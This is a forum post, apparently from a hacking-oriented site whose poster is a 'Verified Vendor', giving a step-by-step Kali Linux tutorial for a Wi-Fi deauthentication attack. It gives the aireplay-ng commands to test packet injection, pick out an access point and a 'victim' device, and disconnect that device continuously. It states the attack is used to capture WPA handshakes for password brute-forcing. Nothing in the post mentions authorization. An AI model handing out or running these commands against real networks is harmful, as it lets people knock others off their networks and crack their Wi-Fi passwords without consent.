What's new

[kali] how to preform deauth attack (disconnect devices from any ap!)

Black Stone

Black Stone

Verfied Vendor
Premium User
Joined
Dec 6, 2016
Messages
6,420
Reaction score
1,862
Points
213
Age
26
Location
United kingdom
This is my first tutorial so enjoy!

What you'll need!

  • A computer/laptop with a wireless card supporting packet injection.
  • A wireless AP/router.
  • A phone or any device you can connect to the AP.
!!!WARNING!!! If your wireless card doesn't support packet injection you CANNOT preform deauth attacks. !!!WARNING!!!
To test and see if your wireless card supports packet injection, do this!

In terminal type "ifconfig", something like this should appear

Spoiler


Don't worry about 'eth0' or 'lo', we're focused on wlan0 for now.
Now that we have the name of the wireless interface, lets turn on monitor mode!
To do this, type this into terminal

Spoiler

[/code]

To confirm that you're wireless card is in monitor mode, do iwconfig and your interface name should now be "wlan0mon"
Now lets test your wireless card to see if it supports packet injection!
In terminal type
aireplay-ng --test wlan0mon
If sommething like this appears
12:47:05 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE) on channel 7
12:47:05 Trying broadcast probe requests...

12:47:06 Injection is working!

12:47:07 Found 1 AP
It works!!
If this
21:47:18 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE) on channel 6

21:47:18 Trying broadcast probe requests...

21:47:20 No Answer...

21:47:20 Found 1 AP
Then it doesn't work:(
Now that we know we can deauth, lets do it!
Since your card is already in monitor mode, just type
airomon-ng wlan0mon
A bunch of stuff will show up(which is good)if you wanna know what most of it means then read below, if not just continue!
Spoiler

Some of you may be wondering, what is station, and why might some of them have probes and also have (not associated) next to it.
The reason for this is because it's simply not connected to an AP, if the probe has a name in it then it's actively trying to find that AP.
You'll need to copy the BSSID's MAC address and your victim connected to that AP's MAC address.
Once you have these, fill out this command and successfully deauth someones device.
aireplay-ng -0 0 -a (BSSID MAC) -c (Device MAC) wlan0mon(your interface name)
e.g aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon
Command meanings!
Code:
-0 is to deauth
0 is the number of deauth packets you'll send, but 0 means you're gonna send them continuously.
-a 50:C7:BF:DC:4C:E8 is MAC address of the AP
-c E0:B5:2D:EA:18:A7 is the MAC address of device
wlan0mon is interface name
It should've worked!, you'll disconnect that device and it'll reconnect. Generally this is used to crack WPA/WPA2, you'll capture the four way handshake and use the handshake to crack it, although you'd still have to use a bruteforce attack to 'guess' the pass.
Anyways, good job! You just successfully deauth'd a device!
[/B][/COLOR]
[B][COLOR=rgb(251, 160, 38)]ICQ 44488[/COLOR][/B]
 
Top